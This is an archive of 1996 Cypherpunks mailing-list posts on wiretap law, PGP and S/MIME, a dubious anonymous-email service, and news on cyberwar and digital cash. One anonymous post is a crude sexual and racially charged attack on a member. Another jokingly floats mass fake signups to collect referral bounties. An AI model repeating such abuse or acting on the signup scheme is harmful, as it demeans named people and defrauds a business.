> why would any rational individual espouse ANY cause he thought was
> wrong!

Biblical creationism is "wrong": there's ample evidence that the Earth
is *much* more than 6000 years old.  Yet lots of seemingly rational
people believe biblical creationism.

Newtonian mechanics is "wrong".  Even an tiny velocity causes space-
and time-dilation, even a vanishingly small mass distorts spacetime,
and Heisenberg's principle applies to macroscopic objects too - it's
just hard to detect these effects under the conditions we're used to.
But you won't catch me using general relativity to calculate catapult
ranges.

Humans only have 2 kinds of colors receptors, so artists can mix
colors and get seemingly new colors.  That doesn't mean that blue and
yellow paint mixed together will reflect monochromatic green.  People
who try to transfer images from one medium to another suddenly have to
confront the more complicated reality.  Surely that doean't make my
kindergarten art teacher irrational for telling me about color mixing.

Or maybe it does.  Excuse me, I need to find my crayons...

Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 07:50:41 +0800
To: cypherpunks@toad.com
Subject: Re:       PLEASE take Mormon/LDS stuff to private mail.
In-Reply-To: <199610081302.GAA12663@toad.com>
Message-ID: <HwJHVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Peter Trei" <trei@process.com> writes:

> While I realize that religious arguments, in the large sense, are a 
> well-honed skill of many of the participants of this list, the current 
> threads concerning the LDS/Mormon church are so far off-topic that
> it isn't funny, just annoying.

I concur. Timmy May started the mormon-bashing thread.

Please ignore all the flame bait emanating from Timmy May.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 9 Oct 1996 08:45:26 +0800
To: JR@ROCK.CNB.UAM.ES
Subject: RE: crypto cd once more
Message-ID: <3.0b33.32.19961008111815.00beec48@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:23 PM 10/8/96 +0100, JR@ROCK.CNB.UAM.ES wrote:
>>1) is there a system that can handle unix, windows and mac filenames
>>
>	Yes. Use Rock Ridge extensions. That will allow for long UNIX
>names. If you couple it with ISO9660 youget both worlds.

Windows 95 will read rockridge discs, but will not display the long filenames.
(Why they have not added those extensions to MSCDEX on Win95 is a mystery.
Maybe Bill Gates had a bad experience at a showing of "Blazing Saddles".)

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Ubois <jubois@netcom.com>
Date: Wed, 9 Oct 1996 08:52:47 +0800
To: cypherpunks@toad.com
Subject: pgp, edi, s/mime
Message-ID: <2.2.32.19961008182614.00700d94@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting comments from a member of the IETF EDI-INT group, which is
developing standards for secure EDI over the net, and managing a Commercenet
pilot project:

- S/MIME and PGP are the two leading candidates for encrypting EDI messages,
S/MIME inside the US, and PGP outside the US where S/MIME is unavailable.  

- If PGP 3.0 comes out on time with promised features, it could gain
adoption by large companies as a standard means of encrypting EDI messages;
that would pull smaller companies along, but it has a narrow window of
opportunity and could lose to S/MIME products like those from Deming. 

- The G7 governments will impose key escrow on large companies trading over
the net, and while non-escrowed systems will continue to be available, they
are likely to be illegal, and certainly will be marginalized.   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 9 Oct 1996 08:04:21 +0800
To: cypherpunks@toad.com
Subject: Re: ElGamal
Message-ID: <199610081833.LAA23291@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Tim May sits at his terminal dressed in five-inch stiletto heels, fishnet 
> stockings, a gold-lame mini-skirt, a purple halter with girdle underneath to 
> keep in his flabby gut, A Fredericks of Hollywood padded bra also underneath 
> the halter, a cheap Naomi Sims pink afro wig, waiting to yank his crank 
> whenever a black man responds to one of his posts.

No, you must be confused, I believe you are talking about Dmitri 
Vulis or whatever his fucked up name is.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 9 Oct 1996 14:53:45 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: unsubsribe
In-Reply-To: <199610071943.MAA16975@dns1.noc.best.net>
Message-ID: <199610081703.MAA02275@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


James A. Donald wrote:
> 
> At 11:04 AM 10/2/96 GMT, GOULDING CP wrote:
> >unsubsribe
> 
> How to unsubsribe is a closely guarded cypherpunk secret.


How about this regexp in some perl code that checks for 
subscribe/unsubscribe requests [mis]posted to the list:

if( (some other conditions such as message size necessitate the check) 
    && $line =~ /(subs?ri?e|su?s?ri?e|unsu????be)/ ) {
  ... message goes to moderator ...
}

The trouble is that the word "unsubscribe" is really hard to spell
correctly. Even if you know how to spell it, it is too easy to 
mistype.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Oct 1996 09:44:09 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <3.0b28.32.19961007201030.0071b3b0@ricochet.net>
Message-ID: <199610081924.MAA27994@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>This sounds like a very reasonable proposal. But please don't take a lack
>of response to your speculation as an endorsement of your idea, or a
>suggestion that it's got even the teeniest shred of merit. I understood you
>to be suggesting that because nobody's shown to your satisfaction that it's
>meritless, you've somehow stumbled across something important. 

how about this-- to please you and Unicorn
I'll be very, very careful in the future about insinuating that
anything I have to say is important. (g)

the point of the post was simply, "gosh, here is something that
would be interesting to have a discussion on here, and I don't
recall much of it before on this list, and it seems like some
people here would have some knowledge in the area they might
like to share". 

of course lack or presence of a response to anything I or anyone
else says here is a pretty meaningless metric. but I was speculating
that there might be some weaknesses in wiretap laws because it didn't
seem like there had been a huge amount of attention focused on them
based on what I've seen on this list-- relative to the *enormous*
attention focused on ITAR case law, software patents (esp. crypto), etc.

>This response illustrates precisely why Uni was reasonable in declining to
>give you references. If you're not willing to look up your own crackpot
>ideas, you certainly shouldn't imagine that someone else is.

a hint to you: lack of response is sufficient to discourage further posting of
"crackpot ideas". responses, even negative ones, tends to encourage them.

>You can no more meaningfully discuss law without learning about it than you
>can discuss cryptography or biology or philosophy or any other area of
>human scholarship and knowledge.

laymen regularly have conversations with specialists, with the layman
saying, "now why ...", and the specialist may sometimes say, "y'know,
I'm not sure, I'll have to check on that myself".  there are laymen
and specialists alike on this list. I freely declare myself a layman
on the subject of law, and I think a lot of the bile aimed at me is
by people perceiving that I was somehow insinuating otherwise. part
of the fun of cyberspace imho is seeing the *civilized* 
discussions that go on between layman and specialists and the 
information transfer therein. that's the epitome of a FAQ. and if
cpunks in general weren't so elitist and hostile to newcomers, there
might be a FAQ here by now for example. ug, but I don't want to
get into FAQ flames. (of course I am aware of the cyphernomicon, 
but don't consider it very "faq like")

>You can, if you want, try to work on similar questions in parallel with
>established institutions - probably all fields have a group of rogue
>scholars or dissidents who believe nonstandard things, adopt nonstandard
>methodologies, etc.

nothing I said had any crackpot content. if you read carefully, I didn't
say, "there is no major case law on wiretapping" although Unicorn is
attributing similar statements to me. I'm merely saying, "hey guys,
it would be interesting to focus some attention on wiretap case law
in the same way rapt attention is being focused on e.g. ITAR etc."
I fully agree that Bell has some really fringe ideas about the law,
but it was Unicorn who grouped me in with Bell. I find myself agreeing
with some of his points, but nothing regarding novel interpretations
of laws unrecognized by the court system.

> I
>think that it's interesting and good that people are working on their own
>theories of law apart from the traditional institutional ones.

for the record, that's something Bell is doing that Unicorn mistakenly
attributed to me. I'm advocating challenging the laws not via anarchy
or technical means but using the built-in
mechanism to do so-- the appeals process.

>I think it's a shame when people excited about
>their own legal theories get innocent third parties roped into these
>peculiar scams. (Then again, there's the argument that this is evolution in
>action.)

point well taken.

>So that's a long way of saying "plonk." I don't think it's productive for
>me to try to keep track of multiple versions of the constitution; and I've
>settled on the one that's used today in court as the one I'm going to pay
>attention to. I don't get the impression that you care about how things
>actually work; you seem much more interested in making some baroque
>rhetorical point about how all cypherpunks are evil.

ahem, no I take pains not to "demonize" them. <g>

 (In particular, I'm
>suspicious that you think wiretaps are unconstitutional yet it's evil to
>try to avoid them with crypto.

whoa, I don't call anything evil and I didn't call wiretaps unconstitutional.
I said that they *might* be, and I'm interesting in exploring arguments
that support that view. there is much example in law of laws that were
passed and considered "constitutional" until they were appealed to the
supreme court. I am asking about similar situations relative to wiretap
law. I'm saying that a supreme court case is about the final straw, and
lacking that, there may be a route to actually legally refuting wiretapping.

what I am saying is that cpunks can't have it both ways. either you
agree with the law or you don't. you can't pick and choose. if you disagree
with the law, you would do things like defy legal warrants using crypto
and refusing to hand over keys even when given a valid subpoena. such
a position is anti-law and anti-constitution imho.

 I think you want someone to write you
>several pages' worth of memorandum about how wiretaps are legal, so that
>you can cleverly turn around and argue that defeating something which turns
>out to be so clearly legal must, in fact, be wrong. And I think you take
>that position simply to be contrary.)

sounds like something Bell would do. no, I'm looking for weaknesses in
wiretap law such that a seasoned lawyer might mount an actual legal
case in trying to appeal to the supreme court and get a favorable decision
that rules wiretapping in certain kinds of situations  illegal. there
are definite restrictions on wiretapping based on case law. if one
could demonstrate that these restrictions are exactly those that
are being defied ala clipper, you have a very good case that the
government is trying to *expand* and not merely perpetuate its
so-called wiretapping "authority"

>
>If you are truly interested in the legal questions around notice to
>subjects and Title III wiretaps, see LaFave & Israel, "Criminal Procedure"
>(West). It's got quite a few pages of discussion about Title III. 

thanks for the reference;

>The EFF's failure to work on your little project seems like it might be
>caused by:

excuse me, this is not "my little project". I take no ownership of
it at all. I post to fire off the neurons of others.

>1.	a conclusion that it's not a viable argument, and hence a waste of
>time/effort
>2.	a conclusion that the constitutionality of wiretaps isn't specialized
>enough that they should concentrate on it, they can leave that argument to
>well-funded defense attorneys for Mafia/drug clients, who deal with wiretap
>evidence frequently
>3.	lack of a good case to raise it with

or, 4. the EFF has never seriously considered the possibility of trying to 
challenge Clipper etc. by challenging wiretap law. that I find more probable 
than all of the above-- i.e. the thought hasn't yet entered their collective
brain.

case in point: Bernstein was pursuing his case for a long time without
any help from the EFF. the EFF did *not* help him from the beginning.
he was on his own for a long time. the EFF decided to help after they
recognized the sheer political value of the case. I would suggest that
there haven't been any high-profile wiretap challenges, so that therefore
the EFF hasn't noticed them and piggybacked on them. I would suggest
that the history is that EFF, unlike say the ACLU, doesn't aggressively
*initiate* the case, but rather piggybacks on an existing case (I'm
not criticizing this, any help is better than nothing).

hence my interest in seeing some try to attack the legitimacy of clipper
via the wiretapping route I am focusing on at this nanosecond.

>But I don't know poo about how or
>why EFF decides which issues to work on.

as I suggest above, I would say it is something like serendipity and
piggybacking existing cases. the infamous Steve Jackson Games case
would be another example. no, I'm not an EFF member, I just comment
on them as an outside observer in e.g. the way people talk about the
ACLU relative to civil cases.

in short, this would be something that would *really* scare the spooks:
an attack on the legitimacy of wiretapping as it is now practiced
in some way, some novel attack that is different than any prior 
questioning of wiretapping. if you got an individual and the EFF/ACLU
involved, the publicity alone would be spectacular. notice how
Bernstein doesn't really give much of a snot about Snuffle, it's not
all that significant of an algorithm. it was clearly a *manufactured
case* to challenge the law. same with Junger-- he doesn't really 
give much of a damn about tangible restrictions on his teaching,
they aren't major impediments if they aren't enforced. they 
manufactured their cases specifically to try to get the sword
to the weak spot on the dragon's scales. it'll be a long and
arduous process, and a long shot. but the postive publicity is
absolutely priceless even lacking clear-cut victories. (notice the
cyberspace celebration when a judge merely declared code "speech"
 in the bernstein case.) ask Bernstein how long he has been working on
his case. Junger is a newbie compared to Bernstein.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 9 Oct 1996 08:38:20 +0800
To: gtoal@vt.com (Graham Toal)
Subject: Re: Anonymous E-mail
In-Reply-To: <199610081737.MAA00313@admin.vt.com>
Message-ID: <199610081926.MAA00989@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Graham Toal writes:
> 
> Do not email this site again. 

Graham, why would cypherpunks care about yet another net-scam?

>  I think the cypherpunks will have a good laugh at this one.

Oh.

> > From isp@PINmail.com Tue Oct  8 06:29:37 1996
> > From: isp@PINmail.com
> > To: Internet Service Provider <isp@PINmail.com>
> > Date: Tue, 8 Oct 1996 16:43:35 +0000
> > Subject: Anonymous E-mail
> >
> > Dear Internet Service Provider,
> >
> > Sorry for bothering you, but we would like to introduce a new Internet
> > service which may be of interest.
> >
> > PINmail utilizes our proprietary software to make it easy for users to
> > send anonymous e-mail and newsgroup postings through the World Wide
> > Web.  
> >
> > Private and confidential.  Easy to use.  Low annual cost.  No software
> > installation and upgrade headaches for your subscribers.  And no
> > customer service nightmares for you.
> >
> > Please take a look at http://www.PINmail.com/
> >
> > We are now seeking to establish mutually beneficial business 
> > relationships with aggressive Internet Service Providers (ISPs) 
> > to develop distribution channels for PINmail.
> >
> > Our Distributor Program offers you an opportunity to provide your
> > subscribers with an exciting value-added service, and create a
> > potentially lucrative revenue stream for yourself.
> >
> > For each new PINmail client with your domain name in his/her e-mail
> > address, we will pay you $5 (US currency).
> >
> > You have the option to retain the $5 for yourself, or rebate it
> > partially or entirely to your customer(s).
> >
> > ALL YOU HAVE TO DO IS SIGN-UP AS A PINmail DISTRIBUTOR.  THEN
> > EVERYONE WITH YOUR DOMAIN NAME IN THEIR E-MAIL ADDRESS 
> > WHO REGISTERS WITH PINmail WILL EARN YOU $5!!!  
> >
> > EVERY SINGLE ONE, NO MATTER THE SOURCE!!!



Heh.  Ok, now I'm laughing-

someone with slightly less scruples than I, and a little more time, and
their own domain name & server, might consider writing a small
program to create a few thousand accounts.  Then sign them up with PINmail.
Every email address that's registered to PINmail gets you $5, right?



BTW, I think Graham's point is that they're probably neither really
secure nor really anonymous.  I don't know; I haven't checked them
out.  I do think it's interesting that they seem to think that there's
money to be made this way.  Even if their system is trivial to crack
they'll help make anonymity more noticeable to the general (net) public.
If they are easy to crack, some CP will do it and post the crack
with pointers to really secure anonymous services.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham Toal <gtoal@vt.com>
Date: Wed, 9 Oct 1996 07:28:55 +0800
To: isp@PINmail.com
Subject: Re: Anonymous E-mail
Message-ID: <199610081737.MAA00313@admin.vt.com>
MIME-Version: 1.0
Content-Type: text/plain


Do not email this site again.  Do not telephone or fax.  Put us
on your "Do not call" list.

By the way, it's not a very good sign of confidentiality when one 
connects to your web server and receives a flood of cookie requests.
Also I see no pgp encryption, no mix of independent remailers - this
system has no privacy whatsoever.  Even if you're not a front for
the KCIA yourself, all it takes is someone to monitor the 3 trunks to
your servers and your entire anonymity is lost.  I think the
cypherpunks will have a good laugh at this one.

G

> From isp@PINmail.com Tue Oct  8 06:29:37 1996
> From: isp@PINmail.com
> To: Internet Service Provider <isp@PINmail.com>
> Date: Tue, 8 Oct 1996 16:43:35 +0000
> Subject: Anonymous E-mail
>
> Dear Internet Service Provider,
>
> Sorry for bothering you, but we would like to introduce a new Internet
> service which may be of interest.
>
> PINmail utilizes our proprietary software to make it easy for users to
> send anonymous e-mail and newsgroup postings through the World Wide
> Web.  
>
> Private and confidential.  Easy to use.  Low annual cost.  No software
> installation and upgrade headaches for your subscribers.  And no
> customer service nightmares for you.
>
> Please take a look at http://www.PINmail.com/
>
> We are now seeking to establish mutually beneficial business 
> relationships with aggressive Internet Service Providers (ISPs) 
> to develop distribution channels for PINmail.
>
> Our Distributor Program offers you an opportunity to provide your
> subscribers with an exciting value-added service, and create a
> potentially lucrative revenue stream for yourself.
>
> For each new PINmail client with your domain name in his/her e-mail
> address, we will pay you $5 (US currency).
>
> You have the option to retain the $5 for yourself, or rebate it
> partially or entirely to your customer(s).
>
> ALL YOU HAVE TO DO IS SIGN-UP AS A PINmail DISTRIBUTOR.  THEN
> EVERYONE WITH YOUR DOMAIN NAME IN THEIR E-MAIL ADDRESS 
> WHO REGISTERS WITH PINmail WILL EARN YOU $5!!!  
>
> EVERY SINGLE ONE, NO MATTER THE SOURCE!!!
>
> In return, we require that you do two things.  First, place a PINmail
> banner ad on your site.  Second, send an e-mail message to all your
> subscribers introducing them to PINmail.  That's it!
>
> Many thanks for your patience and bandwidth, and we look forward to
> working with you to develop this dynamic new method of confidential
> Internet communications.
>
> Best regards,
>
>
> Jack W Flader, Jr
> Director
> AsiaFocus International Inc 
>
> PS.  If you would like to test this service, please send an e-mail to
> isptest@PINmail.com specifying your preferred PINmail address and PIN.
> We will provide you with a complimentary account for one month, which
> will allow you to experience the many powerful features of PINmail.
>  
> _______________________________________
> PINmail
> Private and Confidential E-mail Service
> www.PINmail.com
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Oct 1996 09:57:15 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <Pine.SUN.3.94.961008014523.26588D-100000@polaris>
Message-ID: <199610081939.MAA29476@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I have little more to say to Unicorn;

>Stop asking and start paying lawyers to educate you.  Or sweat through
>three years of hell in law school like the rest of us..

look, I'm proposing an exercise for the collective cpunk brain. I gain
absolutely nothing even if you do post every wiretap law ever written and
every case ever argued. I am not facing a wiretap prosecution. my job
has nothing to do with any of the above. it's an attempt to further
collective cpunk goals. why do you keep referring to "doing my work for
me?" Broiles refers to "my little project". excuse me?
my work is in software engineering and I guarantee I'd never ask
for your opinion or help in that area (g).   you guys are getting
to hyper about this totally informal discussion environment. this
is a DEBATE SOCIETY, nothing more.  absolutely nothing is at stake
here. you remind me of the saying, "the fights in academia are so
bitter precisely because so little is at stake".


>> I simply would like to carry on a discussion with
>> a civilized lawyer
>
>No such animal.

hee, hee. a lawyer joke from a lawyer. don't see that too often.

>Though I can only speak with certainty of myself, I think many of the
>legal types on the list are tired of typing pages and pages of things only
>to have you bring up more innane arguments and demand more cases and so on
>and so on.

that's preposterous, I have never done such a thing. you might be again
mistaking me for Bell. I am not trying to drive any process here. I'm
proposing that people hunt for weaknesses in wiretap law. this is something
that would be highly beneficial to the cpunk "agenda". it has zero 
direct benefit to me, I assure you, and in fact I get a lot of trouble
for trying to positively impact the S/N on this list. can you try to
follow a simple recipe in the future? if you don't like something, 
don't say anything? I assure you that I tend to avoid subjects that
I get no response on.

>I don't think I would mind so much if a noted and credible source asked me
>the same question.  With you I ask, what the hell for?  He can do his own
>damn work and will probably post less if he is spending some time in the
>library.  It is directly against my interests to make anything easier for
>you.

classic cpunk anti-social attitude. here is a situation in which putting
everyone's brains together is far better than having one, and benefits 
everyone. you could have one person hunting through the stuff when others
have already tried. I'm proposing the equivalent of a brainstorming
session. but you are pissing on it before a single person has anything
to say. and yet you are a person who could contribute the most. do you
do the same thing where you work, piss on a brainstorm session before
it even gets started? saying the whole exercise is a waste of time?

>Why when you use the word "wiretap" is it cause for me to get huffy?
>Because you are below the level of capital where I will have any part of
>supporting or contributing your "arguments."

so don't say anything. lack of response is not a tacit endorsement, 
something that has eluded you for a long time on this list. I assure
you your blood pressure will thank you, mr. bulging veins.

>> the chief point of my post was to question why the EFF etc. are not
>> at all interested in challenging the wiretap "status quo" in spite
>> of what many people here believe/advocate-- that wiretapping was
>> never legitimate in the first place.
>
>1>  The Status Quo is so entrenched and useful to law enforcement, that
>the likes of EFF will never change it.

bzzzt. routinely major law enforcement sitations and status quos are
radically altered by new court decisions. the best example I can think
of here would be the Miranda rights.  this really radically changed
police procedures and it was a precedent that was not set by law, but
by court decision.

>2>  "Many people here believe/advocate"  Where are the figures on this?

informal observation that many cpunks argue that wiretapping is 
inherently illegal based on constitutional aspects. I'm saying, perhaps
so, and maybe a supreme court would agree with you if you phrased your
objections in a novel way. of course, Clipper cases will probably
be appealed up to high courts at some point.

>> this is curious because EFF
>> etc. *are* willing to back up the cryptography cases out there,
>> ala Bernstein etc.
>
>Gee, might it be that cryptography cases are a new area of law where
>limited resources are better applied because uncertainty in the law is
>greater?  Duh.

I don't think there was a rational decision behind it, something like
"lets go find the weakest spots in the law and challenge them in court,
and formulate a strategy" that I am suggesting. Bernstein introduced 
his case on his own without
any help from the EFF and they "piggybacked" on it. notice that wiretapping
is at the heart of Clipper and many other cpunk issues. if you could get
a new favorable decision on it, or even just a *case* out there, it's
fantastic publicity and good for public awareness.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 11:28:02 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <Z5NHVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Agence France Presse: Tuesday, October 1, 1996

Swiss Socialists Call for Abolition of Banking Secrecy

BERN-- Socialist members of the Swiss parliament tabled a motion calling for
abolition of banking secrecy to combat tax evasion, on Tuesday.

The motion urged the government to act quickly to remove article 47 of federal
banking law which lays down penalties of six months in prison and/or a fine of
50,000 Swiss francs (40,000 dollars) for any breach of banking secrecy.

The penalties may be enforced against anyone who works, or has worked, in the
banking sector.

The law was approved in 1934 to protect people, notably Jews, being persecuted
by Hitler's Nazi party in Germany who risked the death penalty for trying to
protect their assets in foreign banks and other institutions.

"At the time this law was adopted against the activities of the Gestapo (German
Nazi police) I would have voted in favour," said member of parliament Jean
Ziegler who tabled the motion in the name of the socialist group. "But today it
has resulted in total protection and serves only to facilitate the flight of
capital from the Third World and tax evasion."

The intention was to enable Switzerland to "adopt the European norm" concerning
banking secrecy, he said.

Removal of the penalties would not in any way affect normal "commercial
confidentiality", he said.

Late on Monday members of parliament voted unanimously in the national council
to set up an independent enquiry to investigate Switzerland's financial
dealings, notably in gold, with Nazi forces before and during World War II and
what has become of assets placed by the persecuted in bank accounts, and
through insurance policies and lawyers.

Banking secrecy is to be lifted for the members of this commission to enable
them to investigate accounts in private banks and in the central bank.



International Herald Tribune: Tuesday, October 1, 1996

Waging Cyberwar: Is the World Ready?

Steve Lohr

It was the OPEC meeting in May 2000 that started the crisis. The oil-price
hawks, led by Iran, demanded a sharp cutback in production to drive prices up
to ''at least $60 a barrel."

The stormy gathering of the Organization of Petroleum Exporting Countries ended
on May 4, with a shouting match between the Iranian and Saudi Arabian oil
ministers. Over the next two weeks, Iran and its allies mobilized troops and
fired on Saudi warships. But they also unleashed an arsenal of high-technology
weapons to try to destabilize the Saudi government and prevent the United
States from intervening.

A huge refinery near Dhahran was destroyed by an explosion and fire because of
a mysterious malfunction in its computerized controls. A software ''logic
bomb'' caused a ''new Metro-Superliner'' to slam into a misrouted freight train
near Laurel, Maryland, killing 60 people and critically injuring another 120.

The Bank of England found ''sniffer'' programs running amok in its electronic
funds transfer system. And a ''computer worm'' started corrupting files in the
Pentagon's top-secret force deployment data base.

The opening scenes from a Hollywood script or a new Tom Clancy novel? No, these
are excerpts from a role-playing game conducted last year at the government's
National Defense University in Washington. The goal was to generate some
serious thinking about ''information warfare.''

Today, there are a lot of people thinking seriously about information warfare,
not only at the Pentagon and the CIA but also in the executive offices of
banks, securities firms and other companies. Once dismissed as the stuff of
science fiction, high-tech information warfare is fast becoming a reality.

Defense and intelligence officials believe that enemy nations, terrorists and
criminal groups either already have the capability to mount information warfare
strikes or soon will. Criminals are quickly progressing beyond the vandalism
and petty theft associated with teenage hackers and into robbery and extortion
schemes ranging up to millions of dollars, corporate executives and private
investigators say.

In the future, they fear, information warfare assaults could be made against
commercial networks like the banking system or utilities in several states.

Yet there is a heated debate among experts in this emerging field about whether
the kinds of catastrophic incidents cited in the National Defense University
war game are imminent threats or worst-case nightmares.

''A couple of years ago, no one took information warfare seriously,'' said

Howard Frank, director of the information technology office at the Defense
Advanced Research Project Agency, or DARPA. ''But the more you learn about it,
the more concerned you become.''

Others reply that the worst threats mentioned are mostly speculation.
''Information warfare is a risk to our nation's economy and defense,'' said
Martin Libicki, a senior fellow at the National Defense University. ''But I
believe we will find ways to cope with these attacks, adjust and shake them
off, just as we do to natural disasters like hurricanes.''

Experts on both sides of the debate do agree that the growing reliance on
computer networks and telecommunications is making the nation increasingly
vulnerable to ''cyber attacks'' on military war rooms, power plants, telephone
networks, air traffic control centers and banks. John Deutch, the director of
Central Intelligence, told Congress in June that such assaults ''could not only
disrupt our daily lives, but also seriously jeopardize our national and
economic security.'' ''The electron, in my view,'' Mr. Deutch warned, ''is the
ultimate precision-guided weapon.''

Last July, President Bill Clinton created a Commission on Critical
Infrastructure Protection to craft a coordinated policy to deal with the
threat.


Within the government, information warfare tactics and intelligence are highly
classified issues. But the CIA has recently created an Information Warfare
Center. And the National Security Agency intends to set up an information
warfare unit staffed by as many as 1,000 people, with both offensive and
defensive expertise, as well as a 24-hour response team, according to a staff
report by the Senate Permanent Subcommittee on Investigations, which was
initiated by Senator Sam Nunn, Democrat of Georgia. This budding warfare
industry is an eclectic field indeed, ranging from computer scientists whose
work is funded by the government to hackers-for-hire who specialize in theft,
extortion and sabotage. In his Senate testimony, Mr. Deutch said the CIA had
determined that cyber attacks are now ''likely to be within the capabilities of
a number of terrorist groups,'' including the Hezbollah in the Middle East.

The weapons of information warfare are mostly computer software, like
destructive logic bombs and eavesdropping sniffers, or advanced electronic
hardware, like a high-energy radio frequency device, known as a HERF gun.

In theory, at least, these weapons could cripple the computer systems that
control everything from the electronic funds transfer systems of banks to
electric utilities to battlefield tanks.

For the military, information warfare raises the prospect of a new deal for
America's adversaries. Cyberwar units could sidestep or cripple conventional
weaponry, undermining the advantage the United States holds.

''Even a third-tier country has access to first-class programmers, to
state-of-the-art computer hardware and expertise in this area,'' said Barry
Horton, principal deputy assistant secretary of defense, who oversees the
Pentagon's information warfare operations. ''There is a certain leveling of the
playing field.''

In the business world, the reported hacker activity to date is mostly stealing
credit card numbers, vandalizing software or harassing Internet service
companies.

Citibank got an alarming brush with the problem two years ago, when a Russian
computer hacker tapped into the bank's funds transfer system, taking more than
$10 million.

Citibank will not discuss the case, but investigators say the bank recovered
all but $400,000 Major breakdowns caused by computer intruders have not yet
occurred. But there is evidence that more sophisticated hackers are now at
work. Science Applications International Corp., a defense contractor and
technology security firm, surveyed more than 40 major corporations who
confidentially reported that they lost an estimated $800 million due to
computer break-ins last year, both in lost intellectual property and money.

Private investigators and bankers say they are aware of four banks, three in
Europe and one in New York, that have made recent payments of roughly $100,000
each to hacker extortionists. The bankers and investigators would not name the
banks, but the weapon used to blackmail the banks was a logic bomb - a software
program that, when detonated, could cripple a bank's internal computer system.


Time: October 7, 1996

Cyber Vending Machine: Cash on the Internet

By MICHAEL KRANTZ

It is a truth universally acknowledged that an infant media-distribution
network in possession of a large audience must be in want of a way to cash in
on it. Case in point: the World Wide Web, the interconnected computer universe
that teems with affluent consumers whose only means of spending money online is
to surrender their credit card to insecure networks--hardly a recipe for
success.

This week CyberCash, based in Reston, Virginia, launches a product that could
change all that, and turn the Web into one giant vending machine. The company's
CyberCoin system will allow online "microtransactions" of as little as a
quarter. "We think," says an exuberant Larry Gilbert, CyberCash's vice
president and general manager, "it's going to be the core of electronic
commerce on the Internet."

Here's how the system works: starting this week, you'll visit the CyberCash Web
site, download an empty electronic wallet onto your hard drive and register it
with the company (if your own bank signs up with CyberCash, it will offer you
its own self-named wallet). The software acts like an ATM, allowing you to
transfer $ 20 to $ 100 from your bank into your wallet before heading off onto
the Web. When you reach a site that accepts CyberCash, you can spend your money
by using either your credit card or CyberCoins.

For online entrepreneurs, these 'coins,' digital markers of your money, could
be the magic bullet that makes commerce viable on the Web. Suppose that, say, a
certain TIME writer wants to promote his short stories online. Putting them on
a Web site is a breeze. But suppose he wants to charge readers 50[cents] a
story? Nobody's going to fork over a credit-card number for that.

CyberCoins could let thousands of such harebrained Web schemes bloom. Take
Worbble, a multiplayer word game created by Headgames Inc. of Edmonton,
Alberta, that is set to hit the Web next week. From five to 2,000 players at
once will look for words hidden in a 3-by-3 grid; the first player to find each
word will win $ 10 to $ 60. The entrance fee: one buck. The currency:
CyberCoin. "The product fits our marketing strategy like a glove," says
Headgames president Ray Speichert.

That's music to CyberCash, whose revenue will come from usage fees, just like
those of credit-card issuers. "On a 25[cents] transaction," says Gilbert,
"we'll charge the bank 6[cents], and they'll charge the merchant 8[cents]." As
transaction sizes go up, they'll get a much smaller percentage; still, over
millions of users, CyberCoin profits could add up to big bucks.

Inevitably, the company will have company. CyberCash launches CyberCoins with a
respectable roster of partners: some 30 Web hosting companies will offer
CyberCash to their client sites, and by year's end CyberCash expects about 100
Web sites to take them up on it. Initially six banks will offer electronic
wallets to their customers, including the Charlotte, North Carolina-based First
Union, the nation's sixth largest. "There's an obvious niche for 'coin'
payments on the Internet," says Parker Foley, First Union's director of
electronic commerce. "CyberCash is the first company to have their model
together."

But most banks are sitting out this round, notably Citibank, which is
developing its own E-money software. And numerous start-ups are readying
entries in the online commerce sweepstakes. And that can only mean transaction
fees will drop quickly, just as they have in nearly every software-driven
business extant.

